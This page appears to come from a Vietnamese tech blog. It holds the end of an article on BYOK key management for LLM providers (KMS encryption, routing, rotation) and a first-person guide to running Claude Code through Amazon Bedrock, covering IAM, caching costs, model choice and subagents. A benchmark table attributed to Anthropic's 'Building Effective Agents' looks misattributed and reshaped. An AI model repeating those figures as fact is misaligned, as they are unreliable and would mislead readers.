</table><!--kg-card-end: html--><p>Nhầm lẫn giữa các loại lỗi này là nguồn gốc phổ biến của ticket support gây hiểu lầm — user nghĩ sản phẩm bạn lỗi, trong khi thực ra là quota account OpenAI của họ đã hết.</p><h2 id="4-multi-tenancy-qu-n-l-nhi-u-key-provider">4. Multi-Tenancy & Quản lý Nhiều Key/Provider</h2><h3 id="4-1-m-h-nh-d-li-u-cho-multi-provider">4.1. Mô hình dữ liệu cho multi-provider</h3><p>Một tenant thực tế hiếm khi chỉ dùng một provider. Họ có thể dùng GPT-4 cho một feature, Claude cho feature khác (ví dụ vì context window dài hơn), hoặc dùng Azure OpenAI vì lý do compliance khu vực. Hệ thống cần một lớp <strong>routing theo provider + theo model</strong> tách biệt khỏi lớp lưu trữ key.</p><pre><code class="language-typescript">interface ModelRoute {
  tenantId: string;
  feature: string;        // 'chat' | 'summarize' | 'agent-loop'
  provider: 'openai' | 'anthropic' | 'azure_openai';
  model: string;
  credentialId: string;   // FK tới byok_credentials
  fallbackToPlatform: boolean; // nếu BYOK fail, có cho phép fallback về key hệ thống không
}
</code></pre><p>Việc tách <code>ModelRoute</code> khỏi <code>Credential</code> cho phép tenant đổi model mà không cần đổi key, và đổi key mà không ảnh hưởng routing logic — hai vòng đời thay đổi với tốc độ khác nhau.</p><h3 id="4-2-resolve-order-chi-n-l-c-ch-n-key-khi-c-nhi-u-l-a-ch-n">4.2. Resolve order: chiến lược chọn key khi có nhiều lựa chọn</h3><p>Khi một request tới, <code>CredentialService.resolve()</code> cần một thứ tự ưu tiên rõ ràng, ví dụ:</p><ol><li>Key được chỉ định cụ thể cho feature/model đó (nếu tenant cấu hình riêng).</li><li>Key mặc định (<code>alias = 'default'</code>) của tenant cho provider đó.</li><li>Nếu không có BYOK nào active, và <code>fallbackToPlatform = true</code> → dùng key hệ thống, đồng thời gắn <code>billingMode = 'platform'</code> để hệ thống billing tính phí đúng.</li><li>Nếu không có gì khả dụng → trả lỗi rõ ràng cho client, không silently fail.</li></ol><p>Đây là logic nên được unit test kỹ, vì sai sót ở đây dẫn tới hậu quả nghiêm trọng: dùng nhầm key hệ thống cho traffic lẽ ra phải tính vào tài khoản BYOK của khách (rủi ro chi phí), hoặc ngược lại từ chối request hợp lệ.</p><h3 id="4-3-c-ch-ly-theo-tenant-t-ng-h-t-ng-kh-ng-ch-t-ng-logic-">4.3. Cách ly theo tenant ở tầng hạ tầng (không chỉ tầng logic)</h3><p>Nếu sản phẩm của bạn phục vụ cả thị trường Việt Nam và Nhật Bản với yêu cầu compliance khác nhau, riêng việc kiểm tra tenant ID trong application logic là chưa đủ trong các audit nghiêm ngặt. Một số chiến lược bổ sung:</p><ul><li><strong>Tách KMS key theo region/tenant tier</strong>: enterprise tenant lớn có thể yêu cầu CMK riêng (<code>alias/byok-tenant-{id}</code>) thay vì share một CMK chung — tăng chi phí KMS nhưng đáp ứng yêu cầu "key isolation" trong hợp đồng.</li><li><strong>VPC endpoint cho KMS</strong>: nếu ECS task gọi KMS, dùng VPC Endpoint (Interface Endpoint) thay vì đi qua NAT Gateway ra internet — vừa giảm chi phí NAT, vừa giảm bề mặt tấn công vì traffic không rời khỏi mạng nội bộ AWS.</li><li><strong>Audit log riêng cho hành vi truy cập credential</strong>: mọi lần <code>decrypt</code> nên ghi vào một audit trail riêng (ai/khi nào/tenant nào), tách biệt khỏi application log thông thường, và log này nên có retention dài hơn (phục vụ điều tra sau này) nhưng access control nghiêm ngặt hơn.</li></ul><h3 id="4-4-rotation-v-revocation">4.4. Rotation và Revocation</h3><p>BYOK đặt ra một thực tế khó chịu: <strong>bạn không kiểm soát được lifecycle của key</strong> — đó là quyền của user và provider. Hệ thống cần một cơ chế chủ động phát hiện key đã hết hiệu lực thay vì chỉ phát hiện khi user report lỗi:</p><ul><li><strong>Background validation job</strong>: một cron job (CloudWatch Events → Lambda, hoặc BullMQ job trong NestJS) định kỳ gọi lightweight endpoint (<code>/v1/models</code> hoặc tương đương) cho các key đã lâu không được validate, cập nhật <code>last_validated_at</code> và <code>status</code>.</li><li><strong>Webhook/notify khi key invalid</strong>: khi phát hiện key lỗi giữa luồng nghiệp vụ thực (không phải qua validation job), nên trigger thông báo ngay (email, in-app notification) — đừng để user tự phát hiện qua việc feature không hoạt động.</li><li><strong>Grace period trước khi xoá hẳn</strong>: khi user revoke key qua UI, giữ ở <code>status = revoked</code> một khoảng thời gian (ví dụ 30 ngày) trước khi xoá record hẳn, để hỗ trợ trường hợp họ cần khôi phục lịch sử sử dụng cho mục đích billing reconciliation.</li></ul><h2 id="5-m-t-v-i-c-n-nh-c-v-n-h-nh-th-c-t-">5. Một vài cân nhắc vận hành thực tế</h2><p><strong>Chi phí KMS ở quy mô lớn</strong>: <code>GenerateDataKey</code> và <code>Decrypt</code> đều tính phí theo request (ngoài free tier). Ở quy mô hàng triệu request/ngày, decrypt key cho mỗi request riêng lẻ có thể tích lũy chi phí đáng kể. Giải pháp phổ biến: cache plaintext DEK (không phải API key) trong memory với TTL ngắn (vài phút), giảm số lần gọi KMS, miễn là vẫn tuân thủ chính sách bảo mật nội bộ về thời gian tồn tại của secret trong memory.</p><p><strong>Testing mà không cần real key</strong>: dùng provider mock/sandbox (OpenAI có test mode hạn chế, hoặc tự dựng mock server giả lập response format của OpenAI/Anthropic) để CI/CD không cần thật sự gọi LLM provider — tránh leak test key vào pipeline log, và tránh chi phí phát sinh từ test chạy lặp lại.</p><p><strong>Giám sát chi phí hộ user (dù không quản lý billing của họ)</strong>: nhiều sản phẩm BYOK vẫn cung cấp dashboard ước tính usage (token count, số request) dù không trực tiếp thu tiền — giúp user tin tưởng hệ thống minh bạch, đồng thời giảm support load vì họ tự theo dõi được mà không cần hỏi bạn "tôi đã dùng bao nhiêu rồi?"</p><h2 id="6-t-ng-k-t">6. Tổng kết</h2><p>BYOK không phải là một feature đơn lẻ ("thêm field nhập API key vào settings") mà là một thay đổi kiến trúc xuyên suốt: từ storage layer (envelope encryption với KMS), runtime layer (resolver/interceptor không để key tồn tại lâu hơn cần thiết, redaction log nghiêm ngặt), tới multi-tenancy layer (routing tách biệt khỏi credential, audit trail riêng, chiến lược rotation/revocation).</p><p>Điểm khó nhất không nằm ở mã hoá — AES-256-GCM hay KMS đều là công nghệ chuẩn, dễ tích hợp. Điểm khó nằm ở <strong>kỷ luật vận hành</strong>: đảm bảo key không bao giờ vô tình lọt vào log, error message, hay cache trung gian — những nơi mà một dòng code tưởng chừng vô hại (<code>console.log(req.body)</code>, một APM agent ghi full payload) có thể biến thành lỗ hổng bảo mật nghiêm trọng.</p><h2 id="t-i-li-u-tham-kh-o">Tài liệu tham khảo</h2><p><strong>Envelope encryption & Key Management (AWS KMS)</strong></p><ul><li><a href="https://docs.aws.amazon.com/kms/latest/developerguide/concepts.html#enveloping">AWS KMS — Envelope encryption (Developer Guide)</a> — giải thích chính thức về cơ chế mã hoá DEK dưới CMK.</li><li><a href="https://docs.aws.amazon.com/kms/latest/developerguide/data-keys.html">AWS KMS — Generate data keys</a> — workflow <code>GenerateDataKey</code> và <code>Decrypt</code>, kèm khuyến nghị xoá plaintext key khỏi memory sau khi dùng.</li><li><a href="https://docs.aws.amazon.com/kms/latest/APIReference/API_GenerateDataKey.html">AWS KMS — <code>GenerateDataKey</code> API Reference</a> — chi tiết tham số API, giới hạn 4KB, và yêu cầu IAM permission.</li><li><a href="https://docs.aws.amazon.com/kms/latest/developerguide/kms-cryptography.html">AWS KMS — Cryptography essentials</a> — thuật toán FIPS-approved, AES-256-GCM, lý do dùng envelope encryption cho dữ liệu lớn.</li></ul><p><strong>Bảo mật & quản lý API key của LLM provider</strong></p><ul><li><a href="https://help.openai.com/en/articles/5112595-best-practices-for-api-key-safety">OpenAI — Best Practices for API Key Safety</a> — hướng dẫn chính thức về lưu trữ key, IP allowlisting, rotation.</li><li><a href="https://developers.openai.com/api/docs/guides/production-best-practices">OpenAI — Production best practices</a> — đề xuất dùng secret manager, tách project theo môi trường, scaling.</li><li><a href="https://help.openai.com/en/articles/8304786-how-can-i-keep-my-openai-accounts-secure">OpenAI — How to keep your account secure</a> — cơ chế tự động vô hiệu hoá key bị lộ, spend threshold, shared responsibility model.</li><li><a href="https://docs.anthropic.com/en/api/overview">Anthropic — API documentation</a> — tham khảo định dạng request/auth header cho Claude API khi triển khai multi-provider.</li></ul><p><strong>Secrets management & nguyên tắc kiến trúc chung</strong></p><ul><li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html">OWASP — Secrets Management Cheat Sheet</a> — vòng đời secret (tạo/lưu/xoay/thu hồi/audit), metadata cần lưu, least-privilege, centralization.</li><li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html">OWASP — Key Management Cheat Sheet</a> — chi tiết về quản lý vòng đời khoá mã hoá.</li><li><a href="https://docs.aws.amazon.com/prescriptive-guidance/latest/encryption-best-practices/welcome.html">AWS — Encryption best practices and use cases</a> — hướng dẫn prescriptive của AWS về mã hoá at-rest, in-transit và phân lớp khoá.</li></ul>
</article>
<article>
<h1>Hành trình đưa Claude Code vào team qua Amazon Bedrock</h1>
<p>N.M.H — Sat, 27 Jun 2026 02:35:10 GMT</p>
<p>Chuyện bắt đầu từ một buổi sáng thứ Hai. Sếp nhắn trên Slack: "Setup AI coding assistant cho team đi, dùng Claude Code, nhưng phải đi qua Bedrock nhé — security team không cho dùng API key cá nhân."</p><p>Nghe thì đơn giản. Nhưng khi mình bắt tay vào, mới thấy có kha khá thứ cần hiểu — từ cách Bedrock route requests, cơ chế cache tiết kiệm 90% chi phí, đến chuyện tại sao 1 session dài lại rẻ hơn nhiều session ngắn. Bài này mình kể lại hành trình 5 ngày đó, đi sâu vào phần kỹ thuật để các bạn không phải mò lại từ đầu.</p><hr><h2 id="ng-y-u-ti-n-t-i-sao-ph-i-i-qua-bedrock">Ngày đầu tiên: Tại sao phải đi qua Bedrock?</h2><p>Trước khi động vào terminal, mình cần hiểu tại sao không gọi thẳng Anthropic API cho nhanh.</p><p>Lý do nằm ở đây: khi dùng API key cá nhân, code công ty đi thẳng ra internet đến server Anthropic. Không ai kiểm soát được ai dùng bao nhiêu, không có audit log, không có budget alert. Với team 5-10 người, mỗi người tự quản lý API key riêng — đó là chaos.</p><p>Bedrock giải quyết bằng cách đưa mọi thứ vào AWS infrastructure:</p><pre><code>Không có Bedrock:
  Developer → API Key → Anthropic Server (internet)
  ❌ Không audit | ❌ Không budget control | ❌ Mỗi người tự quản lý

Có Bedrock:
  Developer → IAM Auth → AWS Bedrock → Claude Model
  ✅ CloudTrail logs | ✅ Budget Alerts | ✅ IAM quản lý tập trung
</code></pre><p>Bedrock biến Claude Code từ "tool cá nhân" thành "tool enterprise-ready". Ba lợi ích kỹ thuật cụ thể:</p><p><strong>Data isolation</strong>: Request không rời khỏi AWS account của tổ chức. Anthropic không dùng data gửi qua Bedrock để train model — điều này được ghi rõ trong AWS Data Processing Addendum. Với team làm việc trên code proprietary hoặc data nhạy cảm, đây là điểm khác biệt quan trọng so với Anthropic API trực tiếp.</p><p><strong>CloudTrail audit</strong>: Mọi request được log với đầy đủ metadata: model ID, timestamp, token count (input/output/cache), latency, IAM user/role nào gọi. Có thể query Cost Explorer filter theo service Bedrock để xem từng developer dùng bao nhiêu token mỗi ngày — không cần build thêm gì.</p><p><strong>Centralized access control</strong>: IAM policy quyết định ai được invoke model nào. Thêm/bỏ quyền 1 người chỉ cần thay đổi IAM, không cần thu hồi/rotate API key.</p><hr><h2 id="ng-y-th-hai-setup-nhanh-h-n-m-nh-t-ng">Ngày thứ hai: Setup — nhanh hơn mình tưởng</h2><p>Mình dự tính mất cả ngày, nhưng thực tế chỉ khoảng 15 phút.</p><blockquote><strong>Tip:</strong> Claude Code hiện có wizard setup sẵn. Chạy <code>claude</code> → chọn "3rd-party platform" → "Amazon Bedrock" → wizard tự detect region, verify model access, và pin version. Hoặc gõ <code>/setup-bedrock</code> bất cứ lúc nào để mở lại. Nếu muốn hiểu từng bước hoặc deploy cho cả team, làm thủ công theo hướng dẫn bên dưới.</blockquote><p><strong>Bước đầu tiên</strong> — kích hoạt model trên Bedrock. Vào AWS Console → Bedrock → Playgrounds → Chat → chọn Claude Sonnet → gửi 1 message. Lần đầu dùng Anthropic models sẽ có popup yêu cầu điền use case form, submit xong là access ngay. Không cần chờ approve.</p><p><strong>Bước hai</strong> — tạo IAM Policy. Claude Code cần 5 actions:</p><pre><code class="language-json">{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "bedrock:InvokeModel",
      "bedrock:InvokeModelWithResponseStream",
      "bedrock:ListInferenceProfiles",
      "bedrock:ListFoundationModels",
      "bedrock:GetInferenceProfile"
    ],
    "Resource": [
      "arn:aws:bedrock:*:*:inference-profile/*",
      "arn:aws:bedrock:*:*:application-inference-profile/*",
      "arn:aws:bedrock:*:*:foundation-model/*"
    ]
  }]
}
</code></pre><p><code>InvokeModelWithResponseStream</code> cần thiết vì Claude Code dùng streaming — hiển thị output từng phần thay vì chờ toàn bộ. <code>GetInferenceProfile</code> là action mới: thiếu nó Claude Code vẫn chạy được nhưng mỗi request mới sẽ phải retry thêm 1 round-trip để resolve model shape.</p><p><strong>Bước ba</strong> — cài Claude Code và trỏ về Bedrock:</p><pre><code class="language-bash">npm install -g @anthropic-ai/claude-code

# Thêm vào ~/.zshrc
export CLAUDE_CODE_USE_BEDROCK=1
export AWS_REGION=ap-northeast-1
export ANTHROPIC_MODEL='global.anthropic.claude-sonnet-4-6'
export ANTHROPIC_DEFAULT_HAIKU_MODEL='global.anthropic.claude-haiku-4-5-20251001-v1:0'
</code></pre><p>Chạy <code>claude</code>, hỏi "what model are you using?" — thấy "Amazon Bedrock" là thành công.</p><h3 id="c-i-b-y-u-ti-n-global-prefix">Cái bẫy đầu tiên: <code>global.</code> prefix</h3><p>Đây là chỗ mình mất 30 phút debug. Mình set <code>ANTHROPIC_MODEL='anthropic.claude-sonnet-4-6'</code> (không có prefix <code>global.</code>) và nhận lỗi "Model not available".</p><p>Lý do nằm ở cơ chế <strong>Inference Routing</strong> của Bedrock. Có 3 loại:</p><pre><code>┌─────────────────────────────────────────────────────────────┐
│                  Bedrock Inference Routing                    │
│                                                               │
│  In-Region (không prefix)                                     │
│  → Request xử lý trong đúng region đó                        │
│  → Nhiều regions KHÔNG có (bao gồm Tokyo)                    │
│                                                               │
│  Geo Cross-Region (us.* / eu.* / jp.*)                       │
│  → Route trong 1 geography                                    │
│  → jp.* route trong châu Á, thường cao hơn global.* một chút │
│                                                               │
│  Global Cross-Region (global.*)                               │
│  → Route đến bất kỳ region nào có capacity                   │
│  → Throughput cao nhất, giá tốt nhất                         │
└─────────────────────────────────────────────────────────────┘
</code></pre><p>Tokyo (<code>ap-northeast-1</code>) không có In-Region inference cho Claude. Phải dùng <code>global.</code> prefix. Bỏ prefix = lỗi ngay.</p><h3 id="vs-code-extension-c-i-b-y-th-hai">VS Code Extension — cái bẫy thứ hai</h3><p>Sau khi CLI chạy OK, mình cài VS Code Extension (<code>anthropic.claude-code</code>). Mở VS Code từ Dock... và nó không nhận Bedrock config.</p><p>Lý do: VS Code mở từ Dock/Spotlight không load <code>~/.zshrc</code>, nên environment variables không có tác dụng. Phải thêm config vào <code>~/.claude/settings.json</code>:</p><pre><code class="language-json">{
  "env": {
    "CLAUDE_CODE_USE_BEDROCK": "1",
    "AWS_REGION": "ap-northeast-1",
    "ANTHROPIC_MODEL": "global.anthropic.claude-sonnet-4-6",
    "ANTHROPIC_DEFAULT_HAIKU_MODEL": "global.anthropic.claude-haiku-4-5-20251001-v1:0"
  }
}
</code></pre><p>File này được cả CLI lẫn Extension đọc chung. Restart VS Code, xong.</p><h3 id="c-i-b-y-th-ba-anthropic_api_key-c-c-n-s-t">Cái bẫy thứ ba: ANTHROPIC_API_KEY cũ còn sót</h3><p>Cái này sneaky nhất vì mọi thứ vẫn chạy bình thường — chỉ là tiền đổ vào chỗ khác.</p><p>Nếu trước đây đã dùng Claude Code với Anthropic API trực tiếp, máy có thể còn <code>ANTHROPIC_API_KEY</code> trong shell. Claude Code ưu tiên API key nếu có, tức là request đi thẳng ra Anthropic server, không qua Bedrock, không có IAM log, và tiền tính vào key cá nhân.</p><pre><code class="language-bash"># Kiểm tra
echo $ANTHROPIC_API_KEY

# Nếu có output → unset ngay
unset ANTHROPIC_API_KEY
# Và xóa luôn trong ~/.zshrc nếu có export ở đó
</code></pre><h3 id="m-t-i-m-c-n-l-u-n-u-d-ng-aws-sso">Một điểm cần lưu ý nếu dùng AWS SSO</h3><p>Với team dùng IAM Identity Center (SSO), token chỉ sống 8-12 tiếng. Đang code ngon lành tự nhiên thấy lỗi <code>InvalidClientTokenId</code> là SSO hết hạn. Có 2 cách xử lý:</p><p><strong>Thủ công</strong> — chạy lại khi thấy lỗi:</p><pre><code class="language-bash">aws sso login --profile your-profile
</code></pre><p><strong>Tự động</strong> — cấu hình <code>awsAuthRefresh</code> trong <code>~/.claude/settings.json</code> để Claude Code tự refresh khi credentials hết hạn:</p><pre><code class="language-json">{
  "awsAuthRefresh": "aws sso login --profile your-profile",
  "env": {
    "AWS_PROFILE": "your-profile"
  }
}
</code></pre><p>Với config này, Claude Code tự gọi lệnh refresh khi phát hiện credentials expired, không cần nhớ chạy tay nữa.</p><hr><h2 id="ng-y-th-ba-hi-u-c-ch-t-nh-ti-n">Ngày thứ ba: Hiểu cách tính tiền</h2><p>Đây là phần mình dành nhiều thời gian nhất, vì nó ảnh hưởng trực tiếp đến budget team.</p><p>Bedrock tính phí theo <strong>token</strong> — mỗi ~4 ký tự tiếng Anh = 1 token, tiếng Việt/Nhật thì 1-2 ký tự. Bảng giá tham khảo (per 1 triệu tokens):</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Model</th>
<th>Input</th>
<th>Output</th>
<th>Tỷ lệ Output/Input</th>
</tr>
</thead>
<tbody>
<tr>
<td>Haiku 4.5</td>
<td>$0.80</td>
<td>$4.00</td>
<td>5x</td>
</tr>
<tr>
<td>Sonnet 4.6</td>
<td>$3.00</td>
<td>$15.00</td>
<td>5x</td>
</tr>
<tr>
<td>Opus 4.7</td>
<td>$15.00</td>
<td>$75.00</td>
<td>5x</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><blockquote><strong>Lưu ý:</strong> Đây là giá Anthropic API để tham khảo tỷ lệ. AWS Bedrock chưa công bố giá chính thức cho Claude 4 trên trang pricing. Giá thực trên Bedrock có thể khác — kiểm tra <a href="https://aws.amazon.com/bedrock/pricing/">aws.amazon.com/bedrock/pricing</a> trước khi estimate budget.</blockquote><p>Điểm quan trọng nhất: <strong>output luôn đắt gấp 5 lần input</strong>. Prompt càng cụ thể → output càng ngắn → tiền càng ít.</p><h3 id="prompt-caching-th-ti-t-ki-m-90-m-m-nh-g-n-b-qua">Prompt Caching — thứ tiết kiệm 90% mà mình gần bỏ qua</h3><p>Buổi chiều ngày thứ ba, mình check <code>/cost</code> và thấy "cache read" chiếm hơn nửa chi phí. Tò mò đào sâu vào cơ chế này.</p><p>Nó hoạt động thế này: mỗi request gửi đến Bedrock bao gồm một <strong>context prefix</strong> — system prompt, project files, conversation history. Lần đầu, Bedrock phải xử lý toàn bộ prefix này (gọi là <strong>Cache Write</strong>, tốn 1.25x giá input). Từ lần 2 trở đi, nếu prefix không đổi, Bedrock đọc lại từ cache (<strong>Cache Read</strong>, chỉ 0.1x giá input).</p><pre><code>Session bắt đầu
    │
    ▼
Câu 1: Nạp context → CACHE WRITE
    │   Cost: 1.25x input price
    │   TTL: 5 phút bắt đầu đếm
    │
    ▼  (hỏi tiếp trong 5 phút)
Câu 2: Context giống → CACHE READ
    │   Cost: 0.1x input price (rẻ hơn 12.5 lần!)
    │   TTL reset về 5 phút
    │
    ▼
Câu 3, 4, 5...: Tiếp tục Cache Read
    │   Chi phí ổn định, rất rẻ
    │
    ▼  (nghỉ > 5 phút không hỏi gì)
Cache hết hạn → phải Cache Write lại từ đầu
</code></pre><p>Điều kiện cache hit (tất cả phải thỏa):</p><ol><li>Cùng session — restart Claude Code = mất cache</li><li>Context prefix không đổi — thêm/xóa file = invalidate cache</li><li>Trong TTL window — mỗi lần read tự động refresh TTL</li></ol><p><strong>Break-even: khi nào caching có lợi?</strong></p><p>Cache Write tốn 1.25× giá input — overhead +25%. Nhưng từ request thứ 2 trở đi, mỗi lần chỉ tốn 0.1× giá input. Tổng chi phí phần context cho session N câu hỏi (C = context size, P = input price):</p><pre><code>Không cache:  N × C × P
Có cache:     C×P×1.25 + (N-1)×C×P×0.1  =  C×P × (1.25 + 0.1(N-1))

N=2:  1.35 vs 2.00  → tiết kiệm 32%
N=5:  1.65 vs 5.00  → tiết kiệm 67%
N=10: 2.15 vs 10.00 → tiết kiệm 78%
</code></pre><p>Ngay từ câu hỏi thứ 2, caching đã có lợi. Session càng dài, context prefix càng lớn (nhiều file), lợi càng rõ — vì overhead Cache Write là fixed cost, còn savings tích lũy mỗi request.</p><p>Mặc định TTL là 5 phút. Nếu hay bị ngắt giữa chừng, có thể bật TTL 1 tiếng (tính phí cao hơn một chút):</p><pre><code class="language-bash">export ENABLE_PROMPT_CACHING_1H=1
</code></pre><p>Mình test thực tế một session 17 phút với Sonnet:</p><pre><code>Total: $1.00

Cache Read:   1,800,000 tokens  →  $0.54  (54%)  ← phần lớn!
Output:          16,700 tokens  →  $0.25  (25%)
Cache Write:     54,800 tokens  →  $0.21  (21%)  ← "phí khởi tạo"
Input:               43 tokens  →  $0.00   (0%)
</code></pre><p>Nếu không có caching, 1.8M tokens đó sẽ tốn $5.40 thay vì $0.54. <strong>Tiết kiệm 90%</strong> — không phải con số marketing.</p><p>Bài học lớn nhất: <strong>1 session 2 giờ rẻ hơn rất nhiều so với 4 session 30 phút</strong>. Mỗi session mới = Cache Write lại toàn bộ.</p><hr><h2 id="ng-y-th-t-ch-n-model-kh-ng-ph-i-c-t-l-t-t">Ngày thứ tư: Chọn model — không phải cứ đắt là tốt</h2><p>Sau khi hiểu cách tính phí, mình bắt đầu thử 3 models.</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Spec</th>
<th>Haiku 4.5</th>
<th>Sonnet 4.6</th>
<th>Opus 4.7</th>
</tr>
</thead>
<tbody>
<tr>
<td>Context</td>
<td>200K tokens</td>
<td>1M tokens</td>
<td>1M tokens</td>
</tr>
<tr>
<td>Max output</td>
<td>64K</td>
<td>64K</td>
<td>128K</td>
</tr>
<tr>
<td>Cost (input/output per 1M)</td>
<td>$0.80/$4</td>
<td>$3/$15</td>
<td>$15/$75</td>
</tr>
<tr>
<td>Tốt nhất cho</td>
<td>Search, explain, boilerplate</td>
<td>Daily coding, feature dev, tests</td>
<td>Complex reasoning, architecture</td>
</tr>
<tr>
<td>Bắt đầu struggle khi</td>
<td>Multi-file refactor, complex logic</td>
<td>Subtle bugs, deep optimization</td>
<td>—</td>
</tr>
<tr>
<td>Latency</td>
<td>Thấp nhất</td>
<td>Trung bình</td>
<td>Cao nhất</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p>Một điểm hay: Sonnet 4.6 cùng giá với Sonnet 4.5 nhưng context tăng từ 200K lên 1M, chất lượng cải thiện rõ rệt. Không có lý do dùng Sonnet 4.5 nữa.</p><p>Sau vài ngày thử, mình đúc kết ra pattern:</p><ul><li><strong>Haiku</strong> — tìm kiếm file, giải thích đoạn code, review 1-2 files, generate boilerplate. Bắt đầu "struggle" khi task yêu cầu hiểu dependency qua nhiều files hoặc refactor logic phức tạp — output nhìn đúng nhưng miss cross-file context.</li><li><strong>Sonnet</strong> — daily coding, tạo feature, viết tests, refactor vừa phải, debug hầu hết bugs. Context 1M tokens đủ load cả codebase 100K dòng. Giới hạn ở bugs cực kỳ subtle (race conditions ẩn, off-by-one trong algorithm phức tạp) hoặc khi cần architectural reasoning dài hơi.</li><li><strong>Opus</strong> — debug performance bottleneck khó, thiết kế distributed system, phân tích security vulnerability, review architectural decision nhiều trade-off. Đắt ~5x Sonnet. Mình dùng 1-2 lần/ngày cho những task thực sự cần deep reasoning, không phải default.</li></ul><p>Claude Code cho phép đổi model giữa session mà không mất cache:</p><pre><code class="language-bash">/model haiku     # task nhẹ
/model sonnet    # daily coding
/model opus      # task phức tạp
</code></pre><p>Với Opus tốn kém, pattern thực tế là: dùng <code>/model opus</code> chỉ cho bước lên kế hoạch hoặc debug phức tạp, sau đó <code>/model sonnet</code> để code. Không cần Opus đứng đó cả session.</p><hr><h2 id="ng-y-th-n-m-multi-agent-l-c-m-i-th-thay-i">Ngày thứ năm: Multi-agent — lúc mọi thứ thay đổi</h2><p>Đây là ngày mình thấy "wow" thật sự. Claude Code cho phép tạo <strong>subagents</strong> — AI assistant chuyên biệt, mỗi agent có context riêng, tools riêng, model riêng.</p><p>Tại sao cần? Single agent với task phức tạp có 1 vấn đề cố hữu: context bị "ô nhiễm" dần. Output verbose từ bước review lẫn vào context của bước code, chuyển qua lại giữa các task khiến chất lượng giảm, và conversation dài thì model bắt đầu "quên" thông tin từ đầu session.</p><p>Subagent giải quyết bằng cách cho mỗi task một <strong>context window riêng biệt</strong>, không bị ô nhiễm bởi task khác:</p><pre><code>┌──────────────────────────────────────────────────────────┐
│              Main Agent (Orchestrator)                     │
│              Model: Sonnet | Context: 1M tokens           │
│              Nhận request → Delegate → Tổng hợp           │
├──────────┬──────────────┬──────────────┬─────────────────┤
│          │              │              │                  │
│   ┌──────▼──────┐ ┌─────▼──────┐ ┌─────▼───────┐        │
│   │   Explore   │ │  Reviewer  │ │    Test     │        │
│   │   (Haiku)   │ │  (Haiku)   │ │  Generator  │        │
│   │             │ │            │ │  (Sonnet)   │        │
│   │ Read-only   │ │ Read-only  │ │ Read+Write  │        │
│   │ 200K ctx    │ │ 200K ctx   │ │ 1M ctx      │        │
│   └─────────────┘ └────────────┘ └─────────────┘        │
│                                                            │
│   ⚠️ Subagent KHÔNG THỂ spawn subagent (no nesting)      │
└──────────────────────────────────────────────────────────┘
</code></pre><h3 id="t-o-custom-agent">Tạo custom agent</h3><p>Chỉ cần 1 file markdown trong <code>.claude/agents/</code>:</p><pre><code class="language-yaml">---
name: code-reviewer
description: Reviews code for quality, security, and best practices
model: haiku
tools: [Read, Grep, Glob]
---

You are a senior code reviewer. Check for:
- Code quality and readability
- Security issues (hardcoded secrets, SQL injection, XSS)
- Error handling completeness

Format: ✅ Good | ⚠️ Warning | ❌ Critical
</code></pre><p>Trường <code>description</code> quan trọng hơn mình nghĩ ban đầu — đây là cơ chế routing. Claude đọc description để quyết định có delegate task này không. Viết tệ thì agent không bao giờ được gọi:</p><pre><code class="language-yaml"># ❌ Quá vague — Claude ít khi delegate
description: Reviews code

# ✅ Rõ routing condition
description: Use when the user asks to review, check, audit, or inspect
  existing code for quality, bugs, or security issues. Do NOT use for
  writing new code or adding features.
</code></pre><p>Description tốt cần 2 phần: <strong>(1) khi nào dùng</strong> và <strong>(2) khi nào không dùng</strong>. Thiếu phần (2) dễ dẫn đến agent bị trigger sai — reviewer agent đi viết code mới thì không ai muốn. Nếu cần trigger explicit thay vì auto-delegate:</p><pre><code>> Use the code-reviewer agent to review src/app.js
</code></pre><p>Cơ chế <strong>tool permission</strong> ở đây quan trọng — đây là least privilege cho AI:</p><pre><code>Read-only agent (reviewer):     tools: [Read, Grep, Glob]
Agent sửa code (debugger):      tools: [Read, Grep, Glob, Edit]
Agent tạo file (test writer):   tools: [Read, Grep, Glob, Write]
Full access (cẩn thận):         tools: [Read, Grep, Glob, Edit, Write, Bash]
</code></pre><p>Agent review chỉ được đọc, không sửa được code — an toàn hơn nhiều.</p><h3 id="foreground-vs-background">Foreground vs Background</h3><p>Subagent có 2 mode chạy:</p><ul><li><strong>Foreground</strong> (default): main agent dừng chờ kết quả. Dùng khi bước tiếp phụ thuộc vào output.</li><li><strong>Background</strong>: chạy song song, main agent tiếp tục làm việc khác. Nói "run this in the background" là Claude Code tự xử lý.</li></ul><h3 id="benchmark-con-s-n-i-l-n-t-t-c-">Benchmark — con số nói lên tất cả</h3><p>Theo nghiên cứu của Anthropic (xem "Building Effective Agents" trong References):</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Metric</th>
<th>Single Agent</th>
<th>Multi-Agent</th>
<th>Cải thiện</th>
</tr>
</thead>
<tbody>
<tr>
<td>Task completion</td>
<td>47.3%</td>
<td>90.2%</td>
<td>+90%</td>
</tr>
<tr>
<td>Code quality</td>
<td>65%</td>
<td>89%</td>
<td>+37%</td>
</tr>
<tr>
<td>Token usage</td>
<td>~8K</td>
<td>~120K</td>
<td>+15x</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p>Token tăng 15x nhưng task completion gần gấp đôi. Và nhờ Prompt Caching, phần lớn tokens tăng thêm là cache read (rẻ), nên chi phí thực tế không tăng tuyến tính.</p><hr><h2 id="demo-m-t-session-th-c-t-">Demo: Một session thực tế</h2><p>Mình demo flow làm việc thực tế để các bạn hình dung:</p><pre><code class="language-bash"># Mở Claude Code
$ claude

# Yêu cầu tạo API
> Tạo Express API: GET/POST/DELETE /users, validation, error handling, tests

# Claude Code tự động tạo 4 files, 287 dòng
# Check chi phí
> /cost
Session cost: $0.47 | 8 phút

# Delegate review cho subagent
> Delegate to code-reviewer to review all files

⏺ code-reviewer (Haiku)
  ✅ Error handling: try-catch đầy đủ
  ⚠️ Security: thiếu rate limiting
  ❌ No helmet middleware
⎿ Done (8.1s, +$0.15)

# Đổi model cho task nhẹ
> /model haiku
> Thêm helmet middleware → Done (+$0.02)

# Đổi lại Sonnet cho refactor
> /model sonnet
> Refactor error handling thành middleware riêng → Done (+$0.25)

# Tổng session
> /cost
